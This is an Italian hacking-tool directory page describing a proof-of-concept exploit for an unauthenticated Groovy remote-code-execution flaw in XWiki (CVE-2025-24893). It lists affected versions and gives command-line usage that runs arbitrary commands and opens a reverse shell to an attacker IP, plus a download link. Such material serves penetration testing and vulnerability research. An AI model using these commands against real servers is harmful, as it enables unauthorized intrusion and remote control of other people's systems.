Skip to content
KitploitKITPLOIT
StrumentiBlog
Invia
StrumentiBlog
Invia

Strumenti di Hacking, PenTest e Cybersecurity per il tuo Arsenale di Sicurezza!

Kitploit è una directory di strumenti di hacking, cybersecurity e pentesting. Scopri gli ultimi aggiornamenti dei progetti per trovare vulnerabilità, analizzare sistemi, automatizzare i test e rafforzare la tua sicurezza.

··Feed·Contatto·Privacy·© 2026 Kitploit

Directory degli strumenti

Categorie

Vedi tutte le categorie
Loading categories
CVE-2025-24893-PoC — XWiki Exploit RCE non autenticato per Reverse Shell | Kitploit
Strumenti/GitHubGitHub/80ottanta80/cve-2025-24893-poc
Generazione di PayloadAnalisi delle VulnerabilitàExploitSfruttamento di Applicazioni WebPenetration TestingStrumento di Accesso Remoto
GitHub80ottanta80/cve-2025-24893-poc

CVE-2025-24893-PoC

XWiki Exploit RCE non autenticato per Reverse Shell

Vedi Repository
110 mesi faNon ancora revisionato

Più Popolari

Vedi tutti →

Scopri gli strumenti più utilizzati dalla nostra community.

Esplora tutti gli strumenti

Sfoglia la nostra collezione di strumenti

Vedi tutti gli strumenti →
Condividi

CVE-2025-24893-PoC

Exploit XWiki RCE non autenticato

Versioni XWiki interessate

  • Versioni < 15.10.11
  • Versioni < 16.4.1
  • Versioni < 16.5.0RC1

Descrizione della vulnerabilità

Le versioni interessate di XWiki contengono una vulnerabilità di esecuzione di codice in remoto (RCE) causata da una gestione non sicura delle espressioni Groovy nella macro SolrSearch. Attaccanti non autenticati possono eseguire codice Groovy arbitrario da remoto e ottenere una reverse shell.

Prova di concetto

Questo exploit può essere utilizzato per eseguire codice sulla macchina target e può anche stabilire una reverse shell. Sono disponibili due modalità: interattiva o basata su parametri. L'exploit può avviare automaticamente un listener o usarne uno esistente.

Output interattivo di XWiki

Prerequisiti

Macchina dell'attaccante

  • Python 3
  • Lo script dell'exploit
  • Netcat (se non si utilizza il listener automatico)
  • Macchina target

    • Versione XWiki vulnerabile
    • Connettività di rete con la macchina dell'attaccante

    Utilizzo

    Modalità interattiva

    root@kitploit:~
    python3 xwiki_groovy_rce.py
    

    Modalità a parametri

    root@kitploit:~
    # Remote Code Execution
    python3 xwiki_groovy_rce.py --code "mkdir test" -u http://example.com
    
    # Reverse Shell with automatic listener (default)
    python3 xwiki_groovy_rce.py --reverse-shell -u http://example.com -i YOUR_IP -p 4480
    
    # Reverse Shell without existing listener (no automatic listener)
    python3 xwiki_groovy_rce.py --reverse-shell -u http://example.com -i YOUR_IP -p 4480 --no-listener
    

    Parametri

    -h/--help: Mostra il menu di aiuto

    -u/--url: URL XWiki di destinazione (obbligatorio)

    -r/--reverse-shell: Esegue una reverse shell

    -c/--command: Esegue un singolo comando

    -i/--ip: Specifica l'IP del listener (solo per reverse shell)

    -p/--port: Specifica la porta del listener (solo per reverse shell, default=4444)

    --no-listener: Non avviare un listener (solo per reverse shell)

    Riferimenti

    • https://github.com/dollarboysushil/CVE-2025-24893-XWiki-Unauthenticated-RCE-Exploit-POC/tree/main
    • https://nvd.nist.gov/vuln/detail/CVE-2025-24893
    • https://www.offsec.com/blog/cve-2025-24893/

    Dichiarazione di non responsabilità legale

    Questa prova di concetto è solo a scopo educativo e di test autorizzato.

    L'uso non autorizzato contro sistemi che non possiedi o per i quali non hai esplicita autorizzazione è illegale.

    Gli autori non sono responsabili per qualsiasi uso improprio di queste informazioni.

    Scarica lo strumento